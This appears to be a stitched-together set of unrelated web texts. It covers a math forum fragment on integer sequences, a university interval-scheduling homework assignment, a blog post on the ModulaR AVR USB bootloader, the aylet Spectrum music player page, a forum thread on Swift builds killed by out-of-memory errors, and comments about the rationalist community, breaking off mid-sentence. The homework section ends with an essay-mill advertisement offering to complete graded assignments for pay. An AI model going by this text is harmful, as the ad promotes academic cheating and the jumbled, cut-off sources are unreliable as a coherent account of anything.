thought too deeply about it yet. OK, thank you. I'm starting to wonder if the sequences of 62+k, 62+k-1, 62+k-2,... are the only ones which can fulfill the requirements. I mean, look: also does while not being either descending nor having any particular "step". So are the ones we found really the only ones? well, we know that . so certainly there is no reason to expect . so the only thing left to do is to see if the 2nd condition somehow limits how we can choose the k's. it should be clear we can't let ALL the k's be greater than 1, or else (by quite a bit). but it could be that the sequence alternates...for example (1,2,1,2,1,...,2,1) would work, as would (1,2,5,4,3,2,1,2,1,2,......,2,1). without more information, it seems to me there are a LOT of possibilities (as long as we get to a number k ≤ 64 - n on the nth step, and k = n (mod 2), we can use this construction, and this doesn't exhaust all the possibilities). however, if the integers used are all distinct, these couldn't be used. i'll need to think for a while to see if that condition precludes all increasing then decreasing sequences.
OPCFW_CODE
Algorithms Questionnaire Paper Homework Help CS 330 – Spring 2021 Due: Wednesday, March 3 by midnight via gradescope Read Pages 12-14 from Chapter 1 of our 330 textbook. Also read the following pages from Chapter 4, Greedy Algorithms, from the textbook: pages 115- 125 and for next week pages 137-151. Do the three short questions (a), (b) and (c). Recall the Interval Scheduling Problem from sec- tion 4.1 of the text and which we discussed in class. The questions below all refer to this problem. (a). (4 points) Give an example of an interval scheduling problem instance where at least 3 of the intervals can be scheduled (that is they don’t overlap) and which has EXACTLY 5 different Note: As in the book, you should draw a picture to define the problem instance. To get credit you must state the size of the optimal solutions and also number the intervals and write down the 5 different optimal solutions to the problem. You can write down each optimal solution by writing down the numbers of the intervals that make up the solution. (b). (4 points) Suppose we choose 2 rules for interval scheduling and combine them into one algorithm. Rule 1 selects the interval that is shortest and Rule 2 selects the interval with the fewest conflicts. Both of these rules is considered separately in our textbook. The algorithm A is then: Run rule 1 on the Interval Scheduling Problem instance and then run rule 2 on the same Interval Scheduling Problem instance and output the result which is largest. Show that algorithm A is not optimal by giving a example of an interval scheduling problem instance I which, when we run algorithm A on instance I, results in an answer which is not optimal. Specifically your answer should look like one of those pictured in our textbook (or lecture) and you should explain briefly how this combined algorithm works on your example, what result you get when you run algorithm A on your example and why it is not optimal. (c). (4 points) This question concerns the weighted interval scheduling problem whose short description can be found on page 14 of the textbook, and also see the first paragraph on page 122. 1Here each interval i has a start time ti and find time fi and also positive value vi > 0 assigned to it. Here we assume that no two intervals have the same weight (Just to avoid ties). The goal of the algorithm is to find a list of intervals which don’t overlap and and whose total weight is maximum. (The total weight is the sum of all the weights in the interval chosen.) Show an example where the rule which chooses the largest weight interval at each iteration does not always result with an optimal (that is maximum) solution. So you start with all the intervals, apply the rule to get a largest weight interval (say L), delete all intervals which overlap with L, and repeat until all of the Intervals have either been chosen or For your answer you should just draw a picture (for example, as in Figure 4.1) which shows all the n intervals in your problem instance and where each interval is labeled by number i from 1 to n, where n = the number of intervals in your example. Also give each interval i has a value vi. Then say why the rule does not result in a maximum total value solution by giving the total value of your results using the rule and also the total maximal value of any compatible solution (which should be larger than the one you found). Do you have a similar assignment and would want someone to complete it for you? Click on the ORDER NOW option to get instant services at LindasHelp.com. We assure you of a well written and plagiarism free papers delivered within your specified deadline. DO YOU NEED HELP WITH THIS ASSIGNMENT? Whether you need help writing your paper, or doing a PowerPoint presentation, final exam, discussion question, or lab, Here at Homework nerds we can help. Just click on the below order now button, and let us take care of all your academic needs.
OPCFW_CODE
Update #2 (jan 21 2018): Version 2.0 - Support for windows added! Support to query BL version from loaded app added. For windows, since it does not allow variable-sized HID packets, the packets are padded and thus the speed is slightly slower. Update #1 (jan 6 2018): Improvements to allow USB string manipulation and reenumeration by the bootloaded app. Also uses EP0 for PC-to-device transfers as this is faster. However, this means that transfers whose size is an exact multiple of 8 bytes can never be determined to have ended, so packet format is updated to allow indication of "packet was padded to not be a multiple of 8" and the tool is updated to perform this action as needed. There exist already many AVR bootloaders. "Why another?" you might ask. Well, even though there do exist a lot, none fit my requirements. What sort of requirements could I have, you might wonder. Well, it had to be USB-based. A few exist that do this. It had to be USB-HID so that no driver would be necessary in Windows. Hm... Well, still a few exist that do this. Oh, and I needed it to dynamically load an appliction and allow it to run under it, while still providing USB comms features and encrypted uploads/updates. You see, most of the existing USB bootloaders for AVR only do USB for bootloading. The actual loaded application has no access to the USB stack the bootloader uses. It has to either not use USB or include its own copy of a USB stack. Neither of those options is a good one, really. USB Features? Run under It? All valid exclamations. Yes, this bootloader will act like a Mini-OS. It wil dynamically load an application over USB into flash, and provide an API to it. The API is mainly for communications (USB for now, but other protocols are doable, the apps do not depend on it being USB). The dynamic loading and lack of static linking with V-USB (the USB implementation of choice) might also be important to you, of course, for license reasons (as your code is loaded dynamically, it is not a derived work). The API provided to the application is pretty simple, actually. There is a function to see if there is a complete packet that has been RXed yet, and another to get the packet data if so. There is a function to see if there is space in the TX buffer for a packet, and another to send one. There is also one to run various background tasks, and another to jump into the bootloader (to do an update for example). The packet size maximum supported is 142 bytes (but you can adjust this to any size you wish in the source code). The preferred format is an 8-bit packet type, 8-bit CRC, followed by data. And then there's encrypton... How would you update your application in the field safely without exposing it? With an encrypted update of course. I implemented in AVR assembly the SPECK block cypher decryption code in CBC mode (and the rest in C: encryption, key schedule). I chose the SPECK configuration with 64-bit block and 128-bit keys. It seemed like a reasonable compromise between code size and security for my purposes. But if you want a different config, the SPECK code provided will happily support block sizes of 32, 64, and 128 bits and key sizes of 64, 96, 128, 192, and 256 bits. I only provided an AVR assembly implementation of SPECK-64/128-CBC-decryption, but it is easy to change to all the other variants. Go wild! Encryption in ModulaR is optional. At build time you can include (or not) the key. If no key is included, ModulaR will accept plaintext uploads. If a key is included, only encrypted uploads will be accepted. For speed and codesize, the key included is actually the expanded SPECK keyschedule. This allows us to use SPECK with a 0-byte RAM footprint. Cool, huh? To prevent someone from messing with the cyphertext, a checksum of the decrypted plaintext is computed as it streams in, and the uploaded image is marked as valid only if the checksum matches the expected value (sent encrypted as the last upload block). Marked as valid? Yes. The uploaded code is written to flash, but until it is marked as valid, it will not be run. This prevents partial uploads from trying to run and crashing. For unencrypted uploads, the mark is placed when the "UPLOAD DONE" packet is sent. What about the PC side of this? I used HIDAPI to interact with the device. It supports userspace HID in Windows and has support for Linux and MacOS too. It really is quite wonderful and simple to use. I wrote a tool that can upload an update to ModulaR and another that will do encryption for you and produce for you the keyschedule needed for includion in ModulaR's source. There is also a hacky decryptor app just for you to double-check results of encryption. How big it is? Well, I only optimized for size the most egregious of avr-gcc's mistakes, so the while thing is still quite large - 3300 bytes if you include the 108-byte keyschedule for SPECK-64/128. But this is not actually that bad since your actual application code does not need to include another copy of the USB stack - ModulaR provides you with the data in/out APIs already. In reality with some more ASM-work it can be shrunk quite a bit, but this is already good enough for my purposes, so I am leaving this as it is (for now). How do I use it? Build ModulaR (or use included HEX file if the key 00112233445566778899aabbccddeeff is OK with you :) ) and flash it to an AVR. Wiring is standard VUSB wiring. You can use the provided sample linker script for your app. All interrupt vectors will be passed to you except INT0. That one is reserved for ModulaR and will not be ever passed to your app. Once in a while you'll want to call the usbWork() function. On every boot, ModulaR will wait about 2 seconds for an upload and then boot your application. If no application is found, it will wait forever. If you want to get into the bootloader mode from your application, an API is provided. The included SampleApp demonstrates all the uses. It respondes to a few packet types (Packet 0 echoes back whatever you sent XORed with 0xFF, Packet 1 sends back the sum of all the bytes you sent). To facilitate uploads, if the app detects some of commands reserved for bootloader 0xFC-0xFF, it reboots to the bootloader for easier updates. To encrypt it, run tools/encryptor 00112233445566778899aabbccddeeff < SampleApp.bin > SampleApp.encr.bin. To then upload the resulting file use tools/uploader SampleApp.encr.bin. License?As required by the V-USB inclusion, the AVR code is GPLv2-licensed. This includes my implementation of SPECK. The PC-side code is BSD-3-clause-licensed (this also includes that same implementation of SPECK). Enjoy. You can download ModulaR here: => [LINK] <=
OPCFW_CODE
Description | Download | Changes | Home aylet plays music files in the `.ay' format. These files are essentially wrappers around bits of Z80 code which play music on the Sinclair ZX Spectrum 128's sound hardware - either the beeper, or (eponymously) the AY-3-8912 sound chip. (Files using the Amstrad CPC ports are also supported.) The sound hardware emulation is based on the one I wrote for the Spectrum emulator Fuse, and the Z80 emulation is from Ian Collier's `xz80'. There are front-ends for curses and X, both with much the same features. That said, the curses version does have a `non-UI' option, letting you use it in much the same way as mpg123. You can also output music as a sample on stdout. Note that playlist management is rather poor at the moment (it just plays files specified on the command-line). I do plan to fix this eventually. The current version is 0.5, available from ibiblio. This excerpt from NEWS lists the changes from aylet 0.1 onwards. Fixed a stupid bug where the fadeout time defaulted to zero, so by default all tracks lasting longer than 3 minutes were cut off abruptly. Added 16-bit support. Now defaults to this when possible. New option `-e' forces 8-bit playback (even that is improved, due to the 16-bit mixing now done). Thanks to Stuart Brady for inspiring this change. Added `-t' option, to play only a given track (actually slightly different, see the man page). Thanks to Bartlomiej Ochman for this. Fixed unhelpful interactive stop-after-setting behaviour when started with stop-after set to something not a multiple of 30 seconds; now the first interactive change will set it to the nearest multiple in the specified direction. Thanks to Bartlomiej Ochman for this too. Fixed a compilation error with newer versions of gcc (the code was wrong before, but wasn't complained about). Thanks to Daniel Baumann for pointing this one out. Finally uses accurate AY levels. Thanks to Matthew Westcott for the measurements these were based on. Removed beeper fading, which wasn't actually necessary and was causing problems with some tracks, most noticeably in Trantor. The rest position is still central for AY-only and CPC tracks, though, so the change shouldn't affect those. Added partial port-bitmask to allow for certain less-than-ideal .ay conversions. Thanks to Vít Hotárek for helping find this one. Fixed silly typo which meant that L and L' weren't set correctly when starting up the Z80. (Though curiously, this bug didn't seem to break any .ay files.) Thanks to Patrik Rak for spotting this. Previously, when a track stopped and happened to do so leaving high/low level `silence' (e.g. a few AY tracks and, given the beeper-fade removal, all beeper tracks), if this change happened during a fade the fading level would screw up the silence detection and give (with default settings) up to ten seconds of extra `silence'. Now fixed. In xaylet, long file details (e.g. track name) no longer expand the window to fit, but are clipped. You can still manually resize the window to see the rest of the text, if you like. OUT instructions previously took too long, making some beeper tunes (e.g. Heavy on the Magick) sound terribly slow - fixed. New AY volume levels, which should more closely reflect actual AY output. Added support for CPC files. A native sound driver for OpenBSD. Thanks to Chris Cox for this. Fixed most clicking problems. There are still a few, but it's doing much better than before. Rewrote envelope emulation, the old one couldn't be made to cope with high-speed envelopes (as used in some demos). Also fixes presumably-accidental zero-period envelope use with `negative' volume (e.g. Afterburner). Fixed high-frequency noise. Beeper tones inverted, so they're now the right way up. :-) Changed field label from "Title" to "Misc" throughout. Some files use it for Title, some Copyright, some both. So "Misc" is about the only reasonable label.
OPCFW_CODE
I'm trying to build my SPM package. It builds just fine on my Mac, but on an Ubunutu 22.04 machine, most of it builds, but this step fails with “Killed.” When run as part of swift build, it suggests adding -v to see the invocation (linked above). I wasn't able to add -v to that invocation to get more information. $ /usr/bin/time -f "%E %M" ./test.sh Command exited with non-zero status 137 where test.sh is just that large swift-frontend invocation. If I’m interpreting that correctly, that's 684 MB peak memory used. Is it possible something is killing the process due to using too much RAM? If enabling swap fixed it, then it sounds like the OOM killer was responsible for killing the compiler. I don’t think there’s much an individual process can do to improve the ability to diagnose a kernel routine that vaporizes processes when VM usage gets too high. The related sysctl files are /proc/sys/kernel/core_pattern, etc. You can modify them directly or using sysctl. See this article for example. /proc/sys/kernel/core_pattern supports redirecting core dump to application. Ubuntu uses that feature to let apport to handle core dumps. According to apport man page, it saves core files under /var/crash. Do you see files in that directory? In your cases, the core file might be of bash process, I think. BTW, getting core files is usually the first step in most cases. But you are lucky in this case because the fact that bash core dumped indicated something on its own. If it's OOM issue, I think you should be able to find related messages in /var/log/kern.log (or just run dmesg). You said you saw apport report. Does that mean you use GUI in droplet? If so, I'd suggest to install a minimal Ubuntu server installation. Another option is to install VMware Fusion on your Macbook. It works quite well (I do it all the time. I just use macOS for app development). Maybe start a background process to collect system metrics (especially memory usage)? That may help to investigate the root cause of mysterious build failures. I only see files in /var/crash for the sleep task I killed on purpose to test my crash reporting. I don't get it when swift is killed. I do not use a GUI droplet, only a minimal server. It's definitely a memory exhaustion issue. I fixed it by enabling swap, but that wasn't enough to let the docker build finish. I just ended up moving the docker build to Github actions. So far, so good. does your package have very long source files? iirc, @lorentey recently uncovered a dramatic increase in compiler memory usage as individual source files get longer. breaking up the files into smaller files resolves the issue, apparently. My files are not especially long. I haven't checked Vapor and its dependencies. I don't think the file that was usually crashing was particularly long, but it wasn't always the same one and now I'm not sure which one it was. they are an order of magnitude shorter than the file (40k lines) that was causing swapping when building swift-atomics on swift CI. but the swift CI also probably has much more than 1 GB memory available. I've been frequently running into OOM issues when compiling packages on VMs or in docker containers with low RAM and without swap (and "Killed" is exactly the resulting error). I don't recall the exact numbers but 1 GB is tight for packages with a fair number of dependencies, in my experience.
OPCFW_CODE
The OA Community Group's February 2013 Open Annotation Data Model (this document) has been superseded the following W3C Web Annotation Working Group Candiate Recommendations (July 2016): The Open Annotation data model specifies a very simple method of expressing the provenance of an Annotation. This is able to be mapped into the richer and more complex W3C PROV model. The PROV model is expressed in terms of Activities and Entities consumed or produced by those Activities. There are two Entities in the Open Annotation model, which for expediency and simplicity are collapsed into just These are the Annotation document, and the concept that the Annotation embodies or describes. This is the distinction between oa:serializedAt. In the PROV model we have to split these apart again. We use the oa:Annotation for the concept, and thus still require an Annotation document. There are also two Activities, Annotating and Serializing, which produce these Entities. In this case, Annotating is the process of annotating a resource, and should not be confused or conflated with the Motivation of the same name. Serializing is the process by which the Annotation Document is created. The Annotation document is derived from the concept, which necessarily comes first. The concept was produced as the outcome of the Annotating process, which was performed by an Agent, the object of oa:annotatedBy. The Annotation document was produced as the outcome of the Serializing process, which was also performed by an Agent, the object of oa:serializedBy. Both of these processes happened at a particular point in time, <anno1> a oa:Annotation ; a prov:Entity ; prov:wasGeneratedBy <serializing1> ; prov:wasDerivedFrom <annoConcept1> ; prov:generatedAt "datetime1" ; oa:serializedAt "datetime2" ; oa:serializedBy <agent2> ; oa:annotatedBy <agent1> oa:annotatedAt "datetime1" ; <annotating1> a prov:Activity ; prov:wasAssociatedWith <agent1> . <annoDocument1> a prov:Entity ; prov:generatedAt "datetime2" ; prov:wasGeneratedBy <serializing1> . <serializing1> a prov:Activity ; prov:wasAssociatedWith <agent2> . Although the list of Motivations in the specification is derived from an extensive survey of the annotation landscape, there are many situations where more exact definitions of Motivation are required or desirable. In these cases it is RECOMMENDED to create a new Motivation resource and relate it to one or more that already exist. New Motivations MUST be instances of oa:Motivation, which is a subClass of skos:broader relationship SHOULD be asserted between the new Motivation and at least one existing Motivation, if there are any that are broader in scope. Other relationships, such as skos:closeMatch, SHOULD also be asserted to concepts created by other communities. oa:motivationScheme a skos:ConceptScheme ; oa:editing a oa:Motivation ; skos:inScheme oa:motivationScheme ; skos:prefLabel "Editing"@en . new:correcting a oa:Motivation ; skos:inScheme new:aScheme ; skos:broader oa:editing ; skos:prefLabel "Correcting a Mistake"@en . new2:fixing a oa:Motivation ; skos:inScheme new2:anotherScheme ; skos:broader oa:editing ; skos:closeMatch new:correcting ; skos:prefLabel "Fixing a Mistake"@en . This specification builds upon the work from many previous annotation efforts, including in particular: The editors would like to acknowledge the financial support of the Andrew W. Mellon Foundation for the Open Annotation Collaboration and funding the initial reconcilliation between the Annotation Ontology and Open Annotation Collaboration models. |2013-02-08||rsanderson||Namespace change for W3C best practice| |2013-02-05||rsanderson||W3C Community Draft 2| |2013-01-28||rsanderson||W3C Community Draft 2 (internal for final review)| |2013-01-07||rsanderson||W3C Community Draft 2 (internal for review)| |2012-05-01||rsanderson||W3C Community Draft| |2012-04-05||rsanderson||Internal Draft 2| |2012-03-30||rsanderson||Internal Draft 1|
OPCFW_CODE
If you’re looking to use plasma in your blockchain application, there are a few things you need to know. First, plasma is a decentralized application platform that allows you to build and run decentralized applications, or dapps. second, plasma is built on top of the Ethereum blockchain, so you’ll need to have a basic understanding of Ethereum and smart contracts before you can start using plasma. Finally, plasma is still in its early stages of development, so there may be some bugs and issues that you need to be aware of. Assuming you have a basic understanding of Ethereum and smart contracts, let’s get started with using plasma in your blockchain application. The first thing you need to do is install the plasma client. The easiest way to do this is by using the command line interface (CLI). Once you have the plasma client installed, you’ll need to create a new account. You can do this by running the command “plasma account new”. Once you have your account set up, you’ll need to deposit some Ether into it. You can do this by sending Ether to the address that was generated when you ran the “plasma account new” command. Once your Ether is deposited, you’ll need to create a smart contract. A smart contract is a piece of code that runs on the Ethereum blockchain. There are a few different ways to create a smart contract, but the easiest way is to use the online editor at https://remix.ethereum.org. Once you have your smart contract written, you’ll need to compile it and deploy it to the Ethereum blockchain. Once your smart contract is deployed, you’ll need to interact with it to start using plasma. The easiest way to do this is by using the web3.js library. You can find more information about web3.js at https://web3js.readthedocs.io. Once you have web3.js installed, you’ll need to write some code to interact with your smart contract. The code will vary depending on what your smart contract does, but you can find an example below. Once you have your code written, you’ll need to run it on a computer that has an Ethereum node running. You can find instructions on how to set up an Ethereum node at https://github.com/ethereum/go-ethereum/wiki/Getting-Started. Once your code is running and you’re able to interact with your smart contract, you’re ready to start using plasma in your blockchain application! Other related questions: Q: How does plasma work blockchain? A: Plasma is a Layer 2 scaling solution for Ethereum that enables users to transact with each other without having to wait for confirmations on the main Ethereum blockchain. Plasma is comprised of a network of child chains that are connected to the main Ethereum blockchain. These child chains can process transactions much faster than the main Ethereum blockchain and can also be used to create new tokens. Q: How does Ethereum plasma work? A: Plasma is a proposed framework for scaling the Ethereum blockchain that would enable it to process a much larger number of transactions than it can currently handle. Plasma is similar to the Lightning Network, a proposed solution for scaling the Bitcoin blockchain. Plasma is designed to work in two layers. The first layer is the “root chain” which is the main Ethereum blockchain. The second layer is the “Plasma chain” which is a side chain that is attached to the root chain. The Plasma chain can be used to process transactions that are not critical or time-sensitive. This would allow the root chain to be used for more important transactions, while the Plasma chain handles the less important ones. Plasma chains can be created by anyone. They can be created for any purpose, such as handling transactions for a specific country or region, or for a specific industry. The Plasma framework is still in the early stages of development and has not been implemented on the Ethereum blockchain yet. Q: What do plasma solutions use to create an additional chain to the main blockchain? A: There is no one-size-fits-all answer to this question, as the specific plasma solution used will determine what mechanism is used to create an additional chain. However, some common methods used include creating a new block header that includes a reference to the previous block on the main chain, or using a sidechain that is pegged to the main chain. Q: What is plasma token? A: Plasma token is a digital asset that is used to represent a stake in a Plasma chain. Plasma tokens can be used to pay fees, vote on governance decisions, and block or challenge invalid transactions.
OPCFW_CODE
When something does not work, and you can't understand what, run the system health check and check log files. The system Administrators can run the System Diagnostics and Download Server Logs from the Administration application homepage: The "System Diagnostics" Action can be executed by Administrators from the Administration application → Home landing page by clicking on the corresponding button. A check for many system components will be executed, and in case the issue is present, this will be shown. The following states are possible: We highly recommend fixing issues and having the System Diagnostics pass all the validation rules with Success to be sure the system is working correctly: In case of error or warning, click on the checked item and scroll down to the Details section for more information: Fix the issues and re-run the System Diagnostics. System Diagnostics checks the following items and system components: |#||Verified component||Comments & Useful Links| |1||Verify that windows service 'Matrix42 Engine Common' is running||System Components: Windows Services| |2||Verify that windows service 'Matrix42 Engine Common X86' is running||System Components: Windows Services| |3||Verify that windows service 'Matrix42 Engine Scheduler' is running||System Components: Windows Services| |4||Verify that windows service 'Matrix42 Data Gateway' is running||System Components: Windows Services| |5||Verify that windows service 'Message Queuing' is running||Windows Services| |6||Verify that windows service 'Net.Msmq Listener Adapter' is running||Windows Services| |7||Verify that windows service 'Net.Pipe Listener Adapter' is running||Windows Services| |8||Verify that windows service 'Net.Tcp Listener Adapter' is running||Windows Services| |9||Verify that windows service 'Net.Tcp Port Sharing Service' is running||Windows Services| |10||Verify that any Matrix42 Worker is running||Matrix42 Worker Engine| |11||Serious delays in processing Workflows operations||Matrix42 Worker Engine| |12||Verify that the Email Engine is active||Email Engine and Designer| |13||Verify that Workflow Engine on the Matrix42 Worker is running||Matrix42 Worker Engine: Matrix42 Workers & Workflows| |14||Verify that all Compliance Rules uses the Email Engine for sending emails|| For warnings on this item, please consider adjusting the system as described on this page: Compliance Rules: switching to the new Email Engine |15||Verify that the Data Gateway on the Matrix42 Worker is running||For warnings on this item, please consider adjusting the system as described on this page: Matrix42 Worker Engine: Using Matrix42 Workers as Data Gateway| |16||Verify that windows service 'AppFabric Workflow Management Service' is running||Windows Services| |17||Verify that windows service 'AppFabric Workflow Management Service' is running under account in AppFabric Security group||Windows Services| |18||Verify that windows service 'AppFabric Event Collection Service' is running under account in AppFabric Security group||Windows Services| |19||Verify that windows service 'AppFabric Event Collection Service' is running||Windows Services| |20||Verify that AppFabric Security configured correctly||Workflow Engine: AppFabric| Verify released Workflows compatible with the Worker For warnings on this item, please consider adjusting the system as described on this page: Workflow Engine Migration Guide See also Manage Workflows: Runs on AppFabric |22||Verify connection to database 'Archive'||History Wizard| |23||Verify connection to database 'Datawarehouse'||Data for license management reports| |24||Verify connection to database 'Database File Storage'| |25||Verify that windows service 'Web Deployment Agent Service' is running||Windows Services| |26||Verify connection to database 'Workflow Monitoring'||Workflow Instances Activity Monitoring| |27||Verify connection to database 'Workflow Persistence'||Workflow Engine: Persistence| |28||Verify Workflow activations||Workflows: Publish action| |29||Verify Workflow Engine to start workflow synchronously||Workflow Engine| |30||Verify Workflow Engine to start workflow asynchronously||Workflow Engine| |31||Verify Workflow Instance running on Matrix42 Worker||Workflow Instances Activity Monitoring: Runs on AppFabric| |32||Verify that present Workflow Instances are valid||Workflow Instances Activity Monitoring| |33||Verify connectors configurations||Connectors Overview: Connectors Delivered with Matrix42 products| |34||Service Connections validation||Service Connections| |35||Validating display expressions| |36||Validating dynamic structures| |37||Validating GDIE rules||Generic Data Import Export| |38||Validating grid layouts| |39||Validating quick filters||Quick Filters| |40||Validating structures||Navigation Items: Structures| |41||Verify that reports are accessible.||Reports| Starting with DWP v.11.0 all system components check related to the Data Gateway, AppFabric, and legacy Alerting Engine for Compliance Rules (see items #14-20) will not be present in the System Diagnostics. System Status dashboard is shown on the Administration home page. System Status is run automatically when the home page of the Administration application is opened for the first time and is automatically refreshed every 3 hours after the last automatic check: Click on the Run System Diagnostics action to update the System Status dashboard manually. The dashboard shows when the last check has been run and a summary of the found issues of the following types: For more details on the found issues, click on the checked item: Download system logs It is possible to download logs from the application, without directly accessing the Application Server. This can be done by clicking on the Administration application → Home → Download Server Logs button: All Server Logs are downloaded locally to your device in a .zip archive. You can also check specific logs from the Application Server. As a rule, in the default setup log files are located in C:\Program Files\Matrix42\Matrix42 Workspace Management\Logs\ directory. For more information on the log file types, see also System Components: Web Application section of the page.
OPCFW_CODE
What Exactly Is a Virtualized Container? Tech giants like Google, Microsoft and IBM have all invested heavily in virtualized containers. In its most basic definition, a container is an OS-level virtualization method for executing and running applications. Containers eliminate the need to launch an entire virtual machine for every application. They run on an isolated system and single control host and access a single kernel. In IT circles, you may have heard the name Docker on more than one occasion. Docker is the leading provider of enterprise-level containers. LXC is another big name in virtual container provisioning. What About a Virtual Machine (VM)? A VM allows users to run an operating system in an app window on a desktop. The VM acts like a full, separate computer complete with its own virtualized hardware. This enables you to experiment with different operating systems, software and apps – all in a safe sandboxed environment. VMs run on a firmware, software or hardware called a hypervisor. The hypervisor itself runs on a physical computer – also known as a “host machine” – that provides the VM with resources like RAM and CPU. Multiple VMs can run on a single host machine with resources distributed as users see fit. Which One Is Better? Containers are a newer concept and many argue hold several advantages over VMs. The latter consumes more resources; it runs on a full copy of an operating system (OS), as well as a virtual copy of every hardware component running the OS. This eats up quite a bit of RAM and CPU. Containers, by contrast, require just enough of an OS, libraries and other system resources to run a specific program, and can generally squeeze in about two to three times the number of applications as a VM. Modern containers also run in the cloud, giving users a portable operating environment for deploying, developing and testing new systems. Containers are the clear winner then, right? Well, not exactly. VMs do hold certain advantages. VMs are simple and easy to create for someone with a fair degree of IT-literacy. Developers can just install whatever OS they need and get straight to work, and there is very little learning curve. With easily-accessible software on the market, you can also easily return to an earlier iteration of an OS or clone a new OS entirely. For enterprises and SMBs, however, containers may still be preferable. Containers use much less hardware, making them ideal for running multiple instances of a single application, service or web server. Containers also do what VMs do without a hypervisor, resulting in faster resource provisioning and speedier availability of new applications. If you think you can benefit from a single service that can be clustered and deployed at scale, then containers may be the better option. But, in the big scheme of things, in no way do containers make VMs obsolete. Containers simply provide a new solution for improving overall IT efficiency in specific areas of operation. The best approach may be a hybrid approach, which probably isn’t a full transition to containers, but implementing them alongside VMs so users can capitalize on the respective advantages of each. At the end of the day, every organization’s business needs and infrastructure are different and requires its own unique strategy. So, as cliché as it may sound, you be you… Download this informative eBook from our partner, HPE, and learn why application container technology is a critical piece of IT modernization solutions that will drive digital transformation, hybrid environment adoption and hyper-convergence. topic: containers vs. vms
OPCFW_CODE
we have some problems restoring the date/time settings after clearing the registry. What we are doing now is: - make backup of some registry settings (see below) - clear registry (Upd_RegistryClear) - restore registry settings - save registry (Upd_RegistrySave) Timezone and daylight saving settings are restored correctly, but the time is not correct. - When the timezone “(UTC) Coordinated Universal Time” is set, the time is off by -8 hours. - When the default timezone “(UTC-08:00) Pacific time (US & Canada)” is set, the time is correct. - When the timezone “(UTC+01:00) Amsterdam, Berlin, …” is set, the time is off by -9 hours. How do we restore the date/time settings correctly? Do we have to call “rtcsync” after restoring the registry keys? These are the date/time related registry settings we are saving/restoring: [HKEY_LOCAL_MACHINE\Software\Microsoft\Clock] "AutoDST"=dword:00000001 [HKEY_LOCAL_MACHINE\Time] "TimeZoneInformation"=hex:5C,FE,FF,FF,57,00,2E,00,20,00,4D,00,6F,00,6E,00,67,\ 00,6F,00,6C,00,69,00,61,00,20,00,53,00,74,00,61,00,6E,00,64,00,61,00,72,00,\ 64,00,20,00,54,00,69,00,6D,00,65,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,09,00,05,00,05,00,17,00,3B,00,3B,00,E7,03,00,00,00,00,57,00,2E,00,\ 20,00,4D,00,6F,00,6E,00,67,00,6F,00,6C,00,69,00,61,00,20,00,44,00,61,00,79,\ 00,6C,00,69,00,67,00,68,00,74,00,20,00,54,00,69,00,6D,00,65,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,03,00,06,00,05,00,02,00,00,00,00,00,00,\ 00,C4,FF,FF,FF "TZID"=dword:00000785 The registry keys were taken from Time and Date Registry Settings (Compact 2013). In case your a wondering why we want to do this: This is part of our application update process. Our appliation is integrated in the OS Image, so we have to update the OS whenever we want to update our application. We’d like to reset all registry keys to the default values, except those which might have been changed by our application. The only way i see is to backup “our” registry settings, update the os, clear the registry and restore “our” registry settings after a reboot. Or is there an easier way?
OPCFW_CODE
I am +1 on Step 1 being most important and most difficult here. I would also say I am just okay at it, because connecting with other introverted people is difficult for me and I won't necessarily get far enough into conversation to find out about a lot of people's interests unless they have may in common with me or there's someone outgoing to carry the conversation. (There are many people more naturally inclined to be outgoing who could become amazing at connecting people if they realized that they have tons of this sort of knowledge that other people who are not like them don't obtain.) But deliberately putting yourself in positions where you're going to learn a lot of things about people helps. Organizing groups, speaking about interesting topics, following everyone and their dog on social media, etc. And then being genuinely interested in them, enough that you remember things about them and they enjoy sharing things with you. "All This Time", by Jonathan Coulton. Video for the first song from his new future-themed album, placed in this category because the text-adventure video adds to the story. (Song name-checks Kurzweil and is about our future robot overlords.) Some of this reminds me of a talk by Sumana Harihareswara, a friend of mine in the free software community, where she tries to exmaine which strange and offputting things are necessary and which are needlessly driving people away: Inessential Weirdnesses in Free Software I think there are in fact a lot of parallels between issues in free software and the rationalist community--similarly devaluing Hufflepuff skills even when they're necessary to get the full value out of everyone's contributions, similarly having concerns about not watering down the core philosophical commitments while still being open to newcomers and people who are not yet committed to the entire culture. (FWIW, I am a weakly-connected member of the Bay Area rationalist community--it's not what I think of as my primary community so I'm not particularly present.) This would probably have to be less expensive long-term and at least as convenient as my current living situation (apartment in the south bay) for my partner and I to be interested, but it is something I think we would consider. (I would be more interested in the social group aspect, and he would want low social obligation but would be interested in resource-sharing. I have not yet actually asked him about this post.) In particular, there are plenty of things that are reasonable and useful if shared in small groups (tools, recreation equipment, etc.) but a bit silly for personal use and difficult to share with strangers. I am not interested enough to do the heavy lifting of initial organizing. (I do like the idea of having neighbors pre-selected to be inclined to be "neighborly"--I am happy to watch a child/water plants/play in your garage band/copyedit your report if you will do similar things when I need it. I know little enough about most of my current physical neighbors that we don't know what we can ask of each other.) Took the poll. In general, don't optimize for uniqueness or quirkiness; you have limited space and your potential workplace is probably using the resume to screen for "does this person meet enough of the basic desired qualities that we should find out more about them with an interview". You can add a few small things if they really set you apart, but don't go out of your way to do it. A better opportunity to do this is in your cover letter. The best reference for workplace norms and job-hunting advice that I know is Ask A Manager; you may want to browse her archives. The recent East Bay solstice was my first one. (I'm not usually enthusiastic about rituals or very large social events where I don't know many people--but I do enjoy singing with friendly people, so I came as part of the choir.) I was pleasantly surprised by how not odd it was. It felt quite a lot like other ritual-type events I've gone to--church services, memorial events, formulaic holiday celebrations, etc.: much reinforcing of common themes for the group and reference to shared values and oft-repeated material. It was not as in-groupy as I expected--I could have imagined taking a friend who was not part of the community and not needing to explain much about it; it was mostly appealing to the broadest part of the community rather than deep insider references. (And here I realize I still count myself as in the community even though my recent involvement is mostly passive!) I also appreciated the group activity of writing down meaningful encouragements and posting them on the wall: it gave a sense of who was in the room and the chance to show the best parts of themselves--and something easily visible to make conversation with strangers about during breaks. It did remind me of the sort of activity you might do at a company retreat, but the better kind! I wouldn't mind seeing that repeated. I wouldn't make a restricted donation to a charity unless there was a cause I really cared about but I didn't think the charity behind it was well-run and I didn't know a better way of helping that cause. I do not consider money to keep a good charity running as "wasted"--if anything I am deeply dubious of any charity which claims to have minimal to no administration costs, because it's either untrue (the resources to manage it effectively must come from somewhere, maybe from the founders' own personal resources) or a likely sign of bad management (they think that skimping on the funds needed to manage it effectively in the name of maximizing the basket of "program expenses" is a good organizational strategy). An organization that I think is well-run wants to spend on its cause as much as possible, but is mindful of needing to spend on itself also. If it 